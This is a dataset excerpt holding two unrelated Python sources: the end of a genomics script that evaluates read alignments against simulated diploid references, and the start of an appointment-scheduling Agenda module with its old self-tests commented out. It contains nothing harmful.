math.ceil(alt_pos / constants.STEP)\n while i_alt >= len(alt_offset_index):\n alt_offset_index.append(alt_offset_index[len(alt_offset_index) - 1])\n alt_offset_index[i_alt] = alt_offset\n \n return main_offset_index, alt_offset_index\n\ndef build_offset_index_ref(var_list):\n '''\n ALT1/ALT2-offset indexes are dictionaries with\n key: pos on ALT1/ALT2\n value: offset on ALT1/ALT2 reference sequence at 'key'\n\n Outputs:\n alt1_offset_index:\n dict storing the diff from alt1 to ref\n alt1_pos - alt1_offset_index[i] = ref_pos\n alt2_offset_index:\n dict storing the diff from alt2 to ref\n alt2_pos - alt2_offset_index[i] = ref_pos\n '''\n alt1_offset_index = [0]\n alt2_offset_index = [0]\n for v in var_list:\n #: offset: ref to hap\n offset = v.offset\n idx = math.ceil(v.alt_pos / constants.STEP)\n if v.strand == constants.MAIN_STRAND:\n while idx >= len(alt1_offset_index):\n alt1_offset_index.append(alt1_offset_index[len(alt1_offset_index) - 1])\n alt1_offset_index[idx] = offset\n elif v.strand == constants.ALT_STRAND:\n while idx >= len(alt2_offset_index):\n alt2_offset_index.append(alt2_offset_index[len(alt2_offset_index) - 1])\n alt2_offset_index[idx] = offset\n else:\n print ('Error: unspecified strand', v.strand)\n exit()\n \n return alt1_offset_index, alt2_offset_index\n\n# TODO\ndef print_aln_within_distance(name, reads_offsets, sample_offsets, info, g_info, threshold, read_len, COMPARE_SEQ):\n '''\n Compares alignment with the golden profile if they are near.\n If COMPARE_SEQ is specified, retrieves sequences from ref and haps and calculate the distance.\n '''\n if COMPARE_SEQ == False:\n return\n tmp = []\n for i in reads_offsets:\n tmp.append(abs(info.pos + i - g_info.pos))\n diff = min(tmp)\n if (diff < threshold) or (threshold < 0):\n global TOTALNEAR\n TOTALNEAR += 1\n seq_ref = REF_G[info.pos: info.pos + read_len]\n seq_hapA = HAPA_G[g_info.pos: g_info.pos + read_len]\n seq_hapB = HAPB_G[g_info.pos: g_info.pos + read_len]\n leven_score_g = []\n for i in reads_offsets:\n seq_ref_g = REF_G[g_info.pos - i: g_info.pos - i + read_len]\n leven_score_g.append(levenshtein(seq_ref_g, seq_hapA))\n leven_score_g.append(levenshtein(seq_ref_g, seq_hapB))\n called_d = min(levenshtein(seq_ref, seq_hapA), levenshtein(seq_ref, seq_hapB))\n golden_d = min(leven_score_g)\n global HIGHC, CALL_D_ALT, SIM_D_ALT, CALL_D_ORIG, SIM_D_ORIG\n if called_d >= golden_d:\n CALL_D_ORIG.append(called_d)\n SIM_D_ORIG.append(golden_d)\n else:\n HIGHC += 1\n CALL_D_ALT.append(called_d)\n SIM_D_ALT.append(golden_d)\n if called_d > 5 or golden_d > 5 and __debug__:\n print ('called distance', called_d)\n print ('golden distance', golden_d)\n print ('CALLED (%10d) = %s' % (info.pos, REF_G[info.pos : info.pos + 80]))\n print ('ORIG1 (%10d) = %s' % (g_info.pos - reads_offsets[0], REF_G[g_info.pos - reads_offsets[0] : g_info.pos - reads_offsets[0] + 80]))\n if reads_offsets[0] != reads_offsets[1]:\n print ('ORIG2 (%10d) = %s' % (g_info.pos - reads_offsets[1], REF_G[g_info.pos - reads_offsets[1] : g_info.pos - reads_offsets[1] + 80]))\n print ('PERSON (#%9d) = %s' % (g_info.pos, HAPA_G[g_info.pos : g_info.pos + 80]))\n return\n\ndef compare_sam_info(\n info,\n ginfo,\n threshold,\n sample_offsets=[0],\n reads_offsets=[0],\n ignore_chrom=False\n ):\n '''\n Inputs:\n info:\n info from alignment\n ginfo:\n info from simulation profile (golden)\n offset:\n positiontal offset\n ignore_chrom:\n set True to ignore alignment against different chromosomes\n \n Output:\n an INT representing alignment correctness\n if < 0:\n -1: unmatched chromosome\n -2: unmatched direction\n if >= 0:\n the difference in alignment position\n 0 is a perfect match\n '''\n if (ignore_chrom is False) and (info.chrom != ginfo.chrom):\n #: diff chromosome\n if __debug__:\n print (\"False: chr, mapq =\", info.mapq)\n return -1\n if (info.is_rc() ^ ginfo.is_rc()) is True:\n #: diff direction\n if __debug__: \n print (\"False: direction (%s, %s)\" % (info.is_rc(), ginfo.is_rc()), \"mapq =\", info.mapq)\n return -2\n dist = []\n for soff in sample_offsets:\n for roff in reads_offsets:\n dist.append(abs(info.pos - soff - ginfo.pos + roff))\n return min(dist)\n\ndef diploid_compare(\n info, \n g_info,\n name, \n threshold, \n dip_flag, \n COMPARE_SEQ,\n reads_main_offset_index = {}, \n reads_alt_offset_index = {},\n sample_main_offset_index = {},\n sample_alt_offset_index = {}\n):\n '''\n Uses variable 'dip_flag' to handle different cases of a diploid alignment \n and check if the alignment is correct.\n '''\n sample_offsets = [0]\n if dip_flag in ['same_strand_ref']:\n if sample_main_offset_index != {}:\n i_low = int(info.pos / constants.STEP)\n i_high = math.ceil(info.pos / constants.STEP)\n if i_low >= len(sample_main_offset_index):\n sample_offset_low = sample_main_offset_index[len(sample_main_offset_index) - 1]\n else:\n sample_offset_low = sample_main_offset_index[i_low]\n if i_high >= len(sample_main_offset_index):\n sample_offset_high = sample_main_offset_index[len(sample_main_offset_index) - 1]\n else:\n sample_offset_high = sample_main_offset_index[i_high]\n sample_offsets = [sample_offset_low, sample_offset_high]\n elif dip_flag in ['same_id', 'same_var', 'diff_id', 'diff_var']:\n i_low = int(info.pos / constants.STEP)\n i_high = math.ceil(info.pos / constants.STEP)\n if info.chrom == constants.MAIN_CHROM:\n if i_low >= len(sample_main_offset_index):\n sample_offset_low = sample_main_offset_index[len(sample_main_offset_index) - 1]\n else:\n sample_offset_low = sample_main_offset_index[i_low]\n if i_high >= len(sample_main_offset_index):\n sample_offset_high = sample_main_offset_index[len(sample_main_offset_index) - 1]\n else:\n sample_offset_high = sample_main_offset_index[i_high]\n elif info.chrom == constants.ALT_CHROM:\n if i_low >= len(sample_alt_offset_index):\n sample_offset_low = sample_alt_offset_index[len(sample_alt_offset_index) - 1]\n else:\n sample_offset_low = sample_alt_offset_index[i_low]\n if i_high >= len(sample_alt_offset_index):\n sample_offset_high = sample_alt_offset_index[len(sample_alt_offset_index) - 1]\n else:\n sample_offset_high = sample_alt_offset_index[i_high]\n else:\n print ('Error: invalid chrom', info.chrom, constants.MAIN_CHROM, constants.ALT_CHROM)\n exit()\n sample_offsets = [sample_offset_low, sample_offset_high]\n else:\n print ('Error: undistinguished dip_flag: %s' % dip_flag)\n return False\n \n i_low = int(g_info.pos / constants.STEP)\n i_high = math.ceil(g_info.pos / constants.STEP)\n reads_offsets = []\n #: check hapA\n if name.find(constants.MAIN_HAP) > 0:\n if i_low >= len(reads_main_offset_index):\n reads_offsets.append(reads_main_offset_index[len(reads_main_offset_index) - 1])\n else:\n reads_offsets.append(reads_main_offset_index[i_low])\n if i_high >= len(reads_main_offset_index):\n reads_offsets.append(reads_main_offset_index[len(reads_main_offset_index) - 1])\n else:\n reads_offsets.append(reads_main_offset_index[i_high])\n #: check hapB\n elif name.find(constants.ALT_HAP) > 0:\n if i_low >= len(reads_alt_offset_index):\n reads_offsets.append(reads_alt_offset_index[len(reads_alt_offset_index) - 1])\n else:\n reads_offsets.append(reads_alt_offset_index[i_low])\n if i_high >= len(reads_alt_offset_index):\n reads_offsets.append(reads_alt_offset_index[len(reads_alt_offset_index) - 1])\n else:\n reads_offsets.append(reads_alt_offset_index[i_high])\n\n dist = compare_sam_info(\n info=info,\n ginfo=g_info,\n threshold=threshold,\n sample_offsets=sample_offsets,\n reads_offsets=reads_offsets,\n ignore_chrom=True\n )\n\n if (dist < 0 or dist > threshold) and COMPARE_SEQ:\n print_aln_within_distance(\n name=name,\n reads_offsets=reads_offsets,\n sample_offsets=sample_offsets,\n info=info,\n g_info=g_info,\n threshold=1000,\n read_len=read_len,\n COMPARE_SEQ=COMPARE_SEQ\n )\n\n return dist\n\ndef count_overlapping_vars(\n name,\n info,\n g_info,\n main_index,\n alt_index\n):\n '''\n For an alignment, count the number of overlapping variants.\n The count is based on simulated position \n (look up golden dictionary).\n '''\n num_var = 0 \n for i in range(g_info.pos, g_info.pos + constants.READ_LEN):\n if g_info.chrom == constants.MAIN_CHROM or g_info.chrom == constants.CHROM or g_info.chrom == 'chr' + constants.MAIN_CHROM or g_info.chrom == 'chr' + constants.CHROM:\n # if g_info.chrom == constants.MAIN_CHROM or g_info.chrom == constants.CHROM:\n # if g_info.chrom == constants.MAIN_CHROM:\n if main_index.get(i) != None:\n num_var += 1\n elif g_info.chrom == constants.ALT_CHROM or g_info.chrom == 'chr' + constants.ALT_CHROM:\n # elif g_info.chrom == constants.ALT_CHROM:\n if alt_index.get(i) != None:\n num_var += 1\n else:\n print ('Error: unexpected chrom', info.chrom)\n info.print()\n exit()\n return num_var\n\ndef build_all_indexes(\n var_reads_fn,\n var_sample_fn,\n personalized\n):\n '''\n Reads two var files and builds all the indexes we use for computing correctness\n '''\n var_reads_list = read_var(\n var_reads_fn,\n remove_conflict=True,\n remove_homo_alt=False\n )\n main_index, alt_index = build_index(var_reads_list)\n reads_main_offset_index, reads_alt_offset_index = build_offset_index_ref(var_reads_list)\n #: diploid personalized ref\n if personalized == 2:\n var_sample_list = read_var(\n var_sample_fn,\n remove_conflict=True,\n remove_homo_alt=False\n )\n sample_main_offset_index, sample_alt_offset_index = build_offset_index_ref(var_sample_list)\n #: standard ref seq\n elif personalized == 0:\n #: major allele reference with indels\n if var_sample_fn != None:\n var_sample_list = read_var(\n var_sample_fn,\n remove_conflict=True,\n remove_homo_alt=False\n )\n sample_main_offset_index, _ = build_offset_index_ref(var_sample_list)\n else:\n sample_main_offset_index = {}\n sample_alt_offset_index = {}\n else:\n print ('Error: unsupported personalized parameter', personalized)\n exit()\n return main_index, alt_index, reads_main_offset_index, reads_alt_offset_index, sample_main_offset_index, sample_alt_offset_index\n\ndef analyze_diploid_indels(\n sam_fn,\n golden_dic,\n threshold,\n all_indexes,\n personalized,\n chrom,\n step,\n read_len,\n write_wrt_correctness,\n COMPARE_SEQ\n):\n '''\n Handles I/O and different opperating modes of this script.\n '''\n main_index, alt_index, reads_main_offset_index, reads_alt_offset_index, sample_main_offset_index, sample_alt_offset_index = all_indexes\n \n sam_f = open(sam_fn, 'r')\n sam_prefix = sam_fn[: sam_fn.find('.')]\n summary = Summary(has_answer=True)\n results = []\n \n if write_wrt_correctness:\n correct_fn = sam_prefix + '-correct.sam'\n incorrect_fn = sam_prefix + '-incorrect.sam'\n print ('Write sam files %s and %s wrt to correctness...' % (correct_fn, incorrect_fn))\n correct_f = open(correct_fn, 'w')\n incorrect_f = open(incorrect_fn, 'w')\n\n for line in sam_f:\n #name, info = parse_line(line, erg=True)\n # single-end\n name, info = parse_line(line, erg=True, mason2=True, score=COMPARE_SEQ)\n # paired-end\n # name, info = parse_line(line, erg=True, mason2=False, score=COMPARE_SEQ)\n #: headers\n if name == 'header':\n continue\n summary.add_one()\n\n # first segment: 0\n # second segment: 1\n # g_info = golden_dic[name][info.is_first_seg() ^ 1]\n g_info = golden_dic[name][info.is_first_seg()]\n\n #: counts the number of overlapping variants for all aligned reads\n num_var = count_overlapping_vars(\n name=name,\n info=info,\n g_info=g_info,\n main_index=main_index,\n alt_index=alt_index\n )\n\n if info.is_unaligned():\n dist = -3\n flag = 'unaligned'\n #: alignment against personalized genomes\n elif personalized == 2:\n #: aligned to incorrect haplotype\n name_chrom_mismatch = (\n (name.find(constants.MAIN_HAP) > 0 and info.chrom != constants.MAIN_CHROM) or \n (name.find(constants.ALT_HAP) > 0 and info.chrom != constants.ALT_CHROM)\n )\n if name_chrom_mismatch:\n if num_var == 0:\n flag = 'diff_id'\n else:\n flag = 'diff_var'\n else:\n if num_var == 0:\n flag = 'same_id'\n else:\n flag = 'same_var'\n dist = diploid_compare(\n info=info, \n # g_info=golden_dic[name],\n g_info=g_info,\n name=name, \n threshold=threshold, \n dip_flag=flag, \n reads_main_offset_index = reads_main_offset_index, \n reads_alt_offset_index = reads_alt_offset_index,\n sample_main_offset_index = sample_main_offset_index,\n sample_alt_offset_index = sample_alt_offset_index,\n COMPARE_SEQ=COMPARE_SEQ\n )\n #: alignment against standard ref (and ERG)\n elif personalized == 0:\n flag = 'same_strand_ref'\n dist = diploid_compare(\n info=info, \n # g_info=golden_dic[name],\n g_info=g_info,\n name=name, \n threshold=threshold, \n dip_flag=flag, \n reads_main_offset_index = reads_main_offset_index, \n reads_alt_offset_index = reads_alt_offset_index,\n sample_main_offset_index = sample_main_offset_index,\n sample_alt_offset_index = sample_alt_offset_index,\n COMPARE_SEQ=COMPARE_SEQ\n )\n if num_var == 0:\n flag = 'same_id'\n else:\n flag = 'same_var'\n\n #: converts \"dist\" to binary comparsion decision \"comp\" and adds to summary\n if dist < 0 or dist > threshold:\n comp = False\n else:\n comp = True\n summary.add_by_categories(flag=flag, comp=comp)\n results.append([name, dist, info.mapq, num_var, flag])\n\n if write_wrt_correctness:\n if comp:\n correct_f.write(line)\n else:\n incorrect_f.write(line)\n\n summary.show_summary(has_answer=True)\n sam_f.close()\n\n results_df = pd.DataFrame(results, columns=['name', 'dist', 'mapq', 'numvar', 'category'])\n results_df.to_pickle(sam_fn + '-stats.pkl')\n\n return results_df\n\nif __name__ == '__main__':\n args = parse_args()\n sam_fn = args.sam\n golden_fn = args.golden\n threshold = args.threshold\n var_reads_fn = args.var_reads\n var_sample_fn = args.var_sample\n personalized = args.personalized\n chrom = args.chrom\n write_wrt_correctness = args.write_wrt_correctness\n step = args.step_size\n read_len = args.read_len\n fn_ref = args.debug_ref\n fn_hapA = args.debug_hapA\n fn_hapB = args.debug_hapB\n \n constants.set_chrom(chrom)\n constants.set_step(step)\n constants.set_read_len(read_len)\n\n #USE_PREV_IF_POSSIBLE = False\n USE_PREV_IF_POSSIBLE = True\n if USE_PREV_IF_POSSIBLE and os.path.isfile(sam_fn + '-stats.pkl') and write_wrt_correctness == None:\n print ('Read stats from {0}-stats.pkl'.format(sam_fn))\n df = pd.read_pickle(sam_fn + '-stats.pkl')\n \n print_df_stats(df, threshold, 'all')\n exit()\n\n # global COMPARE_SEQ, \n global HIGHC, TOTALNEAR, REF_G, HAPA_G, HAPB_G, CALL_D_ALT, SIM_D_ALT, CALL_D_ORIG, SIM_D_ORIG\n if (fn_ref != None) and (fn_hapA != None) and (fn_hapB != None):\n COMPARE_SEQ = True\n HIGHC = 0\n TOTALNEAR = 0\n CALL_D_ALT = []\n SIM_D_ALT = []\n CALL_D_ORIG = []\n SIM_D_ORIG = []\n REF_G = read_genome(fn_ref)\n HAPA_G = read_genome(fn_hapA)\n HAPB_G = read_genome(fn_hapB)\n else:\n COMPARE_SEQ = False\n\n all_indexes = build_all_indexes(\n var_reads_fn=var_reads_fn,\n var_sample_fn=var_sample_fn,\n personalized=personalized\n )\n golden_dic = load_golden_dic(golden_fn)\n results_df = analyze_diploid_indels(\n sam_fn=sam_fn,\n golden_dic=golden_dic,\n threshold=threshold,\n all_indexes=all_indexes,\n personalized=personalized,\n chrom=chrom,\n step=step,\n read_len=read_len,\n write_wrt_correctness=write_wrt_correctness,\n COMPARE_SEQ=COMPARE_SEQ\n )\n\n print_df_stats(results_df, threshold, 'all')\n\n if COMPARE_SEQ:\n print ('Num of near alignments =', TOTALNEAR)\n print ('Num of alns have higher score than golden =', HIGHC)\n\n if HIGHC > 0:\n print ('Avg Lev. dist of called ALT alignments =', sum(CALL_D_ALT)/len(CALL_D_ALT))\n print ('Avg Lev. dist of simulated ALT alignments =', sum(SIM_D_ALT)/len(SIM_D_ALT))\n \n print ('Num of near alignments with higher golden score', TOTALNEAR - HIGHC)\n if TOTALNEAR - HIGHC > 0:\n print ('Avg Lev. dist of called ORIG alignments =', sum(CALL_D_ORIG)/(TOTALNEAR-HIGHC))\n print ('Avg Lev. dist of simulated ORIG alignments =', sum(SIM_D_ORIG)/(TOTALNEAR-HIGHC))\n","repo_name":"langmead-lab/reference_flow-experiments","sub_path":"scripts/analyze_diploid_indels.py","file_name":"analyze_diploid_indels.py","file_ext":"py","file_size_in_byte":24479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"35453098496","text":"\"\"\"An Agenda is a list-like container of Appt (appointment).\n\n Author: FIXME for CIS 210, U. Oregon\n\n Each Appt has a date, a start time, an end time, and\n a textual description. They can be converted to and\n from strings, using the from_string class method and the __str__\n method. An Agenda can be read from a file using the\n from_file class method. Intersecting Agendas produces\n a new Agenda whose Appts are periods that are in the overlap\n of Appts in the first and second Agenda.\n \n Modified:\n By Jared Paeschke for use in CIS 322 project\n Appt: added from_iso_date\n added start_isoformat\n added end_isoformat\n\n\"\"\"\n\nimport datetime\nimport dateutil.parser as dt\nfrom dateutil import tz\nclass Appt:\n\n \"\"\"\n A single appointment, starting on a particular\n date and time, and ending at a later time the same day.\n \"\"\"\n \n def __init__(self, day, begin, end, desc): #changed\n \"\"\"Create an appointment on date\n from begin time to end time.\n \n Arguments:\n day: A datetime.date object. The appointment occurs this day.\n begin: A datetime.time object. When the appointment starts. \n end: A datetime.time object, \n after begin. When the appointments ends.\n desc: A string describing the appointment\n \n Raises: \n \tValueError if appointment ends before it begins\n \t\n Example:\n Appt( datetime.date(2012,12,1),\n datetime.time(16,30),\n datetime.time(17,45))\n (December 1 from 4:30pm to 5:45pm)\n \"\"\"\n self.begin = datetime.datetime.combine(day, begin)\n self.end = datetime.datetime.combine(day, end)\n if begin >= end :\n raise ValueError(\"Appointment end must be after begin\")\n self.desc = desc\n return\n\n #added this class method to make Appt from an iso formated date time.\n @classmethod\n def from_iso_date(cls, start, finish, desc):\n begin = dt.parse(start)\n end = dt.parse(finish)\n\n if begin.date() != end.date():\n raise ValueError(\"The start and finish should have the same dates.\")\n\n result = Appt(begin.date(), begin.time(), end.time(), desc)\n return result\n\n @classmethod\n def from_string(cls, txt):\n \"\"\"Factory parses a string to create an Appt\"\"\"\n fields = txt.split(\"|\")\n if len(fields) != 2:\n raise ValueError(\"Appt literal requires exactly one '|' before description\")\n timespec = fields[0].strip()\n desc = fields[1].strip()\n fields = timespec.split()\n if len(fields) != 3:\n raise ValueError(\"Appt literal must start with date, time, time, separated by blanks\")\n appt_date_text = fields[0]\n appt_begin_text = fields[1]\n appt_end_text = fields[2]\n fields = appt_date_text.split(\".\")\n try:\n year = int(fields[0].strip())\n month = int(fields[1].strip())\n day = int(fields[2].strip())\n except:\n raise ValueError(\"Date in Appt literal should be 9999.99.99 (Year.Month.Day)\")\n\n ### \n date = datetime.date(year,month,day)\n begin = datetime.datetime.strptime(appt_begin_text, \"%H:%M\").time()\n end = datetime.datetime.strptime(appt_end_text, \"%H:%M\").time()\n\n result = Appt(date, begin, end, desc)\n return result\n\n #added two methods to get the start and end datetime outputted as iso format.\n def start_isoformat(self):\n return self.begin.replace(tzinfo=tz.tzlocal()).isoformat()\n \n def end_isoformat(self):\n return self.end.replace(tzinfo=tz.tzlocal()).isoformat()\n\n def __lt__(self, other):\n \"\"\"Does this appointment finish before other begins?\n \n Arguments:\n \tother: another Appt\n Returns: \n \tTrue iff this Appt is done by the time other begins.\n \"\"\"\n return self.end <= other.begin\n \n def __gt__(self, other):\n \"\"\"Does other appointment finish before this begins?\n \n Arguments:\n \tother: another Appt\n Returns: \n \tTrue iff other is done by the time this Appt begins\n \"\"\"\n return other < self\n \n def overlaps(self, other):\n \"\"\"Is there a non-zero overlap between this appointment\n and the other appointment?\n\t\tArguments:\n other is an Appt\n Returns:\n True iff there exists some duration (greater than zero)\n between this Appt and other. \n \"\"\"\n return not (self < other or other < self)\n \n def intersect(self, other, desc=\"\"):\n \"\"\"Return an appointment representing the period in\n common between this appointment and another.\n Requires self.overlaps(other).\n \n\t\tArguments: \n\t\t\tother: Another Appt\n\t\t\tdesc: (optional) description text for this appointment. \n\n\t\tReturns: \n\t\t\tAn appointment representing the time period in common\n\t\t\tbetween self and other. Description of returned Appt \n\t\t\tis copied from this (self), unless a non-null string is \n\t\t\tprovided as desc. \n \"\"\"\n if desc==\"\":\n desc = self.desc\n assert(self.overlaps(other))\n # We know the day must be the same. \n # Find overlap of times: \n # Later of two begin times, earlier of two end times\n begin_time = max(self.begin.time(), other.begin.time())\n end_time = min(self.end.time(), other.end.time())\n return Appt(self.begin.date(), begin_time, end_time, desc)\n\n def union(self, other, desc=\"\"):\n \"\"\"Return an appointment representing the combined period in\n common between this appointment and another.\n Requires self.overlaps(other).\n \n\t\tArguments: \n\t\t\tother: Another Appt\n\t\t\tdesc: (optional) description text for this appointment. \n\n\t\tReturns: \n\t\t\tAn appointment representing the time period spanning\n both self and other. Description of returned Appt \n\t\t\tis concatenation of two unless a non-null string is \n\t\t\tprovided as desc. \n \"\"\"\n if desc==\"\":\n desc = self.desc + \" \" + other.desc\n assert(self.overlaps(other))\n # We know the day must be the same. \n # Find overlap of times: \n # Earlier of two begin times, later of two end times\n begin = min(self.begin, other.begin)\n end = max(self.end, other.end)\n return Appt(self.begin.date(), begin.time(), end.time(), desc)\n\n def __str__(self):\n \"\"\"String representation of appointment.\n Example:\n 2012.10.31 13:00 13:50 | CIS 210 lecture\n \n This format is designed to be easily divided\n into parts: Split on '|', then split on whitespace,\n then split date on '.' and times on ':'.\n \"\"\"\n daystr = self.begin.date().strftime(\"%Y.%m.%d \")\n begstr = self.begin.strftime(\"%H:%M \")\n endstr = self.end.strftime(\"%H:%M \")\n return daystr + begstr + endstr + \"| \" + self.desc\n\nclass Agenda:\n \"\"\"An Agenda is essentially a list of appointments,\n with some agenda-specific methods.\n \"\"\"\n\n def __init__(self):\n \"\"\"An empty agenda.\"\"\"\n self.appts = [ ]\n \n @classmethod\n def from_file(cls, f):\n \"\"\"Factory: Read an agenda from a file.\n \n Arguments: \n f: A file object (as returned by io.open) or\n an object that emulates a file (like stringio). \n returns: \n An Agenda object\n \"\"\"\n agenda = cls()\n for line in f:\n line = line.strip()\n if line == \"\" or line.startswith(\"#\"):\n # Skip blank lines and comments\n pass\n else: \n try: \n agenda.append(Appt.from_string(line))\n except ValueError as err: \n print(\"Failed on line: \", line)\n print(err)\n return agenda\n\n def append(self,appt):\n \"\"\"Add an Appt to the agenda.\"\"\"\n self.appts.append(appt)\n\n # def get_date(self):\n # \"\"\"Returns the date of the first appt in the agenda\"\"\"\n # if len(self.appts) < 1:\n # return None\n # else:\n # return self.appts[0].begin.isoformat()\n\n def intersect(self,other,desc=\"\"): \n \"\"\"Return a new agenda containing appointments\n that are overlaps between appointments in this agenda\n and appointments in the other agenda.\n\n Titles of appointments in the resulting agenda are\n taken from this agenda, unless they are overridden with\n the \"desc\" argument.\n\n Arguments:\n other: Another Agenda, to be intersected with this one\n desc: If provided, this string becomes the title of\n all the appointments in the result.\n \"\"\"\n default_desc = (desc == \"\")\n result = Agenda()\n for thisappt in self.appts:\n if default_desc: \n desc = thisappt.desc\n for otherappt in other.appts:\n if thisappt.overlaps(otherappt):\n result.append(thisappt.intersect(otherappt,desc))\n \n return result\n\n def normalize(self):\n \"\"\"Merge overlapping events in an agenda. For example, if \n the first appointment is from 1pm to 3pm, and the second is\n from 2pm to 4pm, these two are merged into an appt from \n 1pm to 4pm, with a combination description. \n After normalize, the agenda is in order by date and time, \n with no overlapping appointments.\n \"\"\"\n if len(self.appts) == 0:\n return\n\n ordering = lambda ap: ap.begin\n self.appts.sort(key=ordering)\n\n normalized = [ ]\n # print(\"Starting normalization\")\n cur = self.appts[0] \n for appt in self.appts[1:]:\n if appt > cur:\n # Not overlapping\n # print(\"Gap - emitting \", cur)\n normalized.append(cur)\n cur = appt\n else:\n # Overlapping\n # print(\"Merging \", cur, \"\\n\"+\n # \"with \", appt)\n cur = cur.union(appt)\n # print(\"New cur: \", cur)\n # print(\"Last appt: \", cur)\n normalized.append(cur)\n self.appts = normalized\n\n def normalized(self):\n \"\"\"\n A non-destructive normalize\n (like \"sorted(l)\" vs \"l.sort()\").\n Returns a normalized copy of this agenda.\n \"\"\"\n copy = Agenda()\n copy.appts = self.appts\n copy.normalize()\n return copy\n \n def complement(self, freeblock):\n \"\"\"Produce the complement of an agenda\n within the span of a timeblock represented by \n an appointment. For example, \n if this agenda is a set of appointments, produce a \n new agenda of the times *not* in appointments in \n a given time period.\n Args: \n freeblock: Looking for time blocks in this period \n that are not conflicting with appointments in \n this agenda.\n Returns: \n A new agenda containing exactly the times that \n are within the period of freeblock and \n not within appointments in this agenda. The \n description of the resulting appointments comes\n from freeblock.desc.\n \"\"\"\n copy = self.normalized()\n comp = Agenda()\n day = freeblock.begin.date()\n desc = freeblock.desc\n cur_time = freeblock.begin\n for appt in copy.appts:\n if appt < freeblock:\n continue\n if appt > freeblock:\n if cur_time < freeblock.end:\n comp.append(Appt(day,cur_time.time(),freeblock.end.time(), desc))\n cur_time = freeblock.end\n break\n if cur_time < appt.begin:\n # print(\"Creating free time from\", cur_time, \"to\", appt.begin)\n comp.append(Appt(day, cur_time.time(), appt.begin.time(), desc))\n cur_time = max(appt.end,cur_time)\n\n if cur_time < freeblock.end:\n # print(\"Creating final free time from\", cur_time, \"to\", freeblock.end)\n comp.append(Appt(day, cur_time.time(), freeblock.end.time(), desc))\n return comp\n\n\n\n def __len__(self):\n \"\"\"Number of appointments, callable as built-in len() function\"\"\"\n return len(self.appts)\n\n def __iter__(self):\n \"\"\"An iterator through the appointments in this agenda.\"\"\"\n return self.appts.__iter__()\n\n def __str__(self):\n \"\"\"String representation of a whole agenda\"\"\"\n rep = \"\"\n for appt in self.appts:\n rep += str(appt) + \"\\n\"\n return rep[:-1]\n\n def __eq__(self,other):\n \"\"\"Equality, ignoring descriptions --- just equal blocks of time\"\"\"\n if len(self.appts) != len(other.appts):\n return False\n for i in range(len(self.appts)):\n mine = self.appts[i]\n theirs = other.appts[i]\n if not (mine.begin == theirs.begin and\n mine.end == theirs.end):\n return False\n return True\n\n\n#########################\n# Self-test invoked when module is run\n# as main program. \n#########################\n\n# Commented out all test cases. I am using nose to do the testing in another files\n\n# from test_harness import *\n# import io\n# def selftest_appt():\n# \"\"\"Simple smoke test for Appt class.\"\"\"\n# sample = Appt(datetime.date(2012, 10, 31),\n# datetime.time(14, 30), datetime.time(15, 45),\n# \"Sample appointment\")\n# testEQ(\"Create and format\",str(sample),\n# \"2012.10.31 14:30 15:45 | Sample appointment\") \n \n# earlier = Appt(datetime.date(2012, 10, 31),\n# datetime.time(13, 30), datetime.time(14,30), \n# \"Before my appt\")\n# later = Appt(datetime.date(2012, 10, 31),\n# datetime.time(16,00), datetime.time(21,00), \"Long dinner\")\n \n# testEQ(\"Strictly before is '<'\", earlier < later, True)\n# testEQ(\"Strictly after is '>'\", later > earlier, True)\n# testEQ(\"Not earlier than itself\", earlier < earlier, False)\n# testEQ(\"Not later than itself\", earlier > later, False)\n \n# testEQ(\"Earlier doesn't overlap later\", earlier.overlaps(later), False) \n# testEQ(\"Later doesn't overlap earlier\", later.overlaps(earlier), False)\n \n# conflict = Appt(datetime.date(2012, 10, 31), \n# datetime.time(13, 45), datetime.time(16,00),\n# \"Conflicting appt\")\n\n# testEQ(\"Should overlap\", sample.overlaps(conflict), True)\n# testEQ(\"Opposite overlap\", conflict.overlaps(sample), True)\n# overlap = sample.intersect(conflict)\n# testEQ(\"Expected intersection\", str(overlap), \n# \"2012.10.31 14:30 15:45 | Sample appointment\")\n# overlap = conflict.intersect(sample)\n# testEQ(\"Expected intersection\", str(overlap), \n# \"2012.10.31 14:30 15:45 | Conflicting appt\")\n# overlap = conflict.intersect(sample,\"New desc\")\n# testEQ(\"Expected intersection\", str(overlap), \n# \"2012.10.31 14:30 15:45 | New desc\")\n\n# text = \"2012.10.31 14:30 15:45 | from text\"\n# from_text = Appt.from_string(text)\n# testEQ(\"String <-> Appt\",text, str(from_text))\n# def die():\n# Appt.from_string(\"2012.10.31 15:45 14:30 | time traveler\")\n# testRaise(\"Time order error\", ValueError, die) \n \n\n# def selftest_agenda():\n# \"\"\"Simple smoke test for Agenda class.\"\"\"\n\n# keiko_agtxt=\"\"\"# Free times for Keiko on December 1\n# 2012.12.1 07:00 08:00 | Possible breakfast meeting\n# 2012.12.1 10:00 12:00 | Late morning meeting\n# 2012.12.1 14:00 18:00 | Afternoon meeting\n# \"\"\"\n\n# kevin_agtxt=\"\"\"2012.11.30 09:00 14:00 | I have an afternoon commitment on the 30th\n# 2012.12.1 09:00 15:00 | I prefer morning meetings\n# # Kevin always prefers morning, but can be available till 3, except for \n# # 30th of November.\n# \"\"\"\n\n# emanuela_agtxt = \"\"\"\n# 2012.12.1 12:00 14:00 | Early afternoon\n# 2012.12.1 16:00 18:00 | Late afternoon into evening\n# 2012.12.2 8:00 17:00 | All the next day\n# \"\"\"\n \n# keiko_ag = Agenda.from_file(io.StringIO(keiko_agtxt))\n# kevin_ag = Agenda.from_file(io.StringIO(kevin_agtxt))\n# emanuela_ag = Agenda.from_file(io.StringIO(emanuela_agtxt))\n\n# keiko_kevin = keiko_ag.intersect(kevin_ag)\n# kk = (\"2012.12.01 10:00 12:00 | Late morning meeting\\n\" +\n# \"2012.12.01 14:00 15:00 | Afternoon meeting\")\n# kkactual = str(keiko_kevin)\n# testEQ(\"Keiko and Kevin\", kkactual.strip(), kk.strip())\n\n# kevin_emanuela = kevin_ag.intersect(emanuela_ag)\n# ke = \"2012.12.01 12:00 14:00 | I prefer morning meetings\"\n# keactual = str(kevin_emanuela)\n# testEQ(\"Kevin and Emanuela\", keactual, ke)\n\n# everyone = keiko_kevin.intersect(emanuela_ag)\n# testEQ(\"No overlap of all three\", len(everyone), 0)\n\n# def selftest2_agenda():\n\n# print(\"\"\"\n# **********************************\n# *** Smoke test Agenda addenda **\n# *** normalization and complement**\n# ********************************\"\"\")\n \n# \"\"\"Additional tests for agenda normalization and complement.\"\"\"\n# # What could go wrong in sorting? \n# keiko_agtxt=\"\"\"2013.12.2 12:00 14:00 | Late 